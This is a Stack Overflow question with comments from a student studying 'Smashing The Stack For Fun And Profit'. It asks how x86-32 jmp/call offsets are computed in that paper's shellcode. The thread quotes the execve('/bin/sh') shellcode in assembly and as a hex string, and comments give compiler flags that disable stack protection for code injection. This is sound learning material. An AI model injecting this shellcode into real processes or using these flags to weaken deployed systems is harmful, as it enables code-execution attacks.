How to manually calculate jump offsets in intel x86-32 ? How are the instructions fetched in x86? One instruction at a time or as chunks of 4 bytes?

Question

I was going through the paper Smashing The Stack For Fun And Profit. Now there is a section of assembly code where we need to calculate the offsets manually forjmp and call instruction, which are relative to the program counter.

        jmp    offset-to-call               # 2 bytes   -----         
        popl   %esi                         # 1 byte         |      <----------
        movl   %esi,array-offset(%esi)      # 3 bytes        |                |
        movb   $0x0,nullbyteoffset(%esi)    # 4 bytes        |                |
        movl   $0x0,null-offset(%esi)       # 7 bytes        |                |
        movl   $0xb,%eax                    # 5 bytes        |                |
        movl   %esi,%ebx                    # 2 bytes        |                |
        leal   array-offset,(%esi),%ecx     # 3 bytes        |                |
        leal   null-offset(%esi),%edx       # 3 bytes        |                |
        int    $0x80                        # 2 bytes        |                |
        movl   $0x1, %eax                   # 5 bytes        |                |
        movl   $0x0, %ebx                   # 5 bytes        |                |
        int    $0x80                        # 2 bytes        |                |
        call   offset-to-popl               # 5 bytes <-------       ----------
        /bin/sh string goes here.

The above is the rough sketch of the assembly the author wants to achieve.

Then the author plugs in the actual offsets as follows:

        jmp    0x26                     # 2 bytes
        popl   %esi                     # 1 byte
        movl   %esi,0x8(%esi)           # 3 bytes
        movb   $0x0,0x7(%esi)           # 4 bytes
        movl   $0x0,0xc(%esi)           # 7 bytes
        movl   $0xb,%eax                # 5 bytes
        movl   %esi,%ebx                # 2 bytes
        leal   0x8(%esi),%ecx           # 3 bytes
        leal   0xc(%esi),%edx           # 3 bytes
        int    $0x80                    # 2 bytes
        movl   $0x1, %eax               # 5 bytes
        movl   $0x0, %ebx               # 5 bytes
        int    $0x80                    # 2 bytes
        call   -0x2b                    # 5 bytes
        .string \"/bin/sh\"             # 8 bytes

I have the basic knowledge of how instruction fetch works. Especially I have experience of MIPS 32 assembly. There all the instructions are of fixed length (4 bytes) and the instructions are fetched in chunks of 4 bytes. Now for a jump instruction there, we calculate the offset for the target branch as follows:

Suppose, the target of a branch (relative) is at an address x which is word aligned (assuming word length of 4 bytes). And if our jump instruction is at address y. The offset is such a value, which shall give the target, when added with the current PC (program counter). So when the instruction at address y is fetched, PC is y+4. So we get the offset to the target address as x-y-4.

Now if we consider the same here, considering the instructions are fetched in instruction granularity (i.e. not in chunks of 4 bytes but based on the size of the instruction), then when the jmp instruction is fetched, the PC (eip) points to the popl instruction. So based on that offset to the call instruction should have been : 1+3+4+7+5+2+3+3+2+5+5+2=42= 0x2a (and not 38=0x26). So definitely, it is not the way how it is done.

Based on this approach, if I calculate the offset in call instruction, I get the offset as: -(5+2+5+5+2+3+3+2+5+7+4+3+1)=-47=-0x2f

Now, just tweaking into the instructions, I found that for the jmp the offset is calculated on the basis that the PC (eip) points to the start of movb, after jmp is fetched.

Also the offset for call is calculated on the basis that PC (eip) points to the start of the call instruction.

Please can anyone help me out, how are these manual calculations done?

In real CPUs, instructions are fetched 16 or 32 bytes at time, or from the uop cache in groups of up to 6 uops (https://www.realworldtech.com/sandy-bridge/3/). But the machine behaves as-if instructions were fetched 1 at a time, and [Observing stale instruction fetching on x86 with self-modifying code](https://stackoverflow.com/q/17395557) is not possible so I-fetch details have pretty much zero effect on correctness, only performance. Decoding knows where each instruction ended; that's the reference point for relative calls and x86-64 RIP-relative addressing. — Peter Cordes, Aug 07 '22 at 08:00
This design decision was made for 8086, though, which fetched bytes 2 at a time (or 1 at a time for 8088) into a prefetch buffer, and decoded iteratively though the byte stream, not at all like a pipelined design like MIPS. [Why do call and jump instruction use a displacement relative to the next instruction, not current?](https://stackoverflow.com/q/58720936) explains the design decision in those terms. — Peter Cordes, Aug 07 '22 at 08:08
Your method of calculating the offsets is correct, and the values shown in your source are simply incorrect. Probably the code was changed after originally computing the offsets and they weren't updated, which is the biggest hazard of trying to do such things by hand. — prl, Aug 07 '22 at 08:18
You did get the wrong offset for the call instruction, though, because its destination should be the popl and not the jmp instruction. — prl, Aug 07 '22 at 08:19
Yup, on more careful reading of the question, I was just about to say the same thing as @prl. I actually checked with GAS assembling that code (with the jmp/call targets replaced with labels), and the jmp is encoded as `eb 2a jmp`. (https://godbolt.org/z/953MKsP8c has the source with the right target for the call. I fixed that in your diagram assuming that was just an ASCII art mistake, not a misunderstanding of the jmp/call/pop shellcode idiom to get an address into a register in a PC-relative way. Like using MIPS `bal rel16` to set `$ra` to point at some data that followed it.) — Peter Cordes, Aug 07 '22 at 08:23
@pri Thank you for the help. Yes, it was an error on my part. Being unable to get the logic behind the calculation was bugging me so much that while making the ASCII art, I extended the `call` arrow to the `jmp` instead of the `popl` instruction. And watching that diagram, I calculated the offset wrongly. (Had an extra 2 bytes in it). I have fixed it now. — Abhishek Ghosh, Aug 07 '22 at 09:20
@PeterCordes Thanks for the online tool, which practically verified my calculations... — Abhishek Ghosh, Aug 07 '22 at 09:27
@PeterCordes, I also verified the `-0x2f` offset in the `call` instruction. Assuming `rel32`, `-0x2f` gets converted to `0x ff ff ff d1` in 2's complement. In the little-endian system, it is reflected as `d1 ff ff ff` in the instruction. — Abhishek Ghosh, Aug 07 '22 at 09:46
https://godbolt.org/ just uses gcc or clang to compiler or assemble, and `objdump -d` to disassemble into a listing. You can do the same thing locally with `gcc -c foo.S` / `objdump -drwC -Mintel foo.o`. But yeah it's quite handy for linking to other people, and very good for playing around with how C or other high-level languages compile to asm. — Peter Cordes, Aug 07 '22 at 09:50
And yeah, relative call is only available in a rel32 form, so small displacements always have to get sign-extended to 32-bit. — Peter Cordes, Aug 07 '22 at 09:52
@PeterCordes can you give me suggestions regarding where I can successfully execute the binaries generated? Because my Lubuntu 22.04 OS detects the stack smashing and aborts the process. I am a master's student and would like to learn the concepts through hands-on experience. — Abhishek Ghosh, Aug 08 '22 at 11:36
Some modern distros configure GCC with `-fstack-protector-strong` on by default. Use `-fno-stack-protector -zexecstack` to make executables vulnerable to old-school code injection. Keep in mind that non-executable stacks are very widely used in real life, but a simple code-injection attack is still useful to understand as a building block for understanding other forms of doing stuff in a target process, like ROP attacks. — Peter Cordes, Aug 08 '22 at 11:42
The paper (Smashing the stack for fun and profit) generates a hexadecimal format of the shellcode which the author wrote. He says that he did that using GDB. We require that to be fed into a buffer (character array). I do not know how to generate that kind of output from the a.out file using GDB. Please can you guide me? A tutorial which shows how to achieve that... `"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh";` I meant this string — Abhishek Ghosh, Aug 17 '22 at 14:26

How to manually calculate jump offsets in intel x86-32 ? How are the instructions fetched in x86? One instruction at a time or as chunks of 4 bytes?

0 Answers0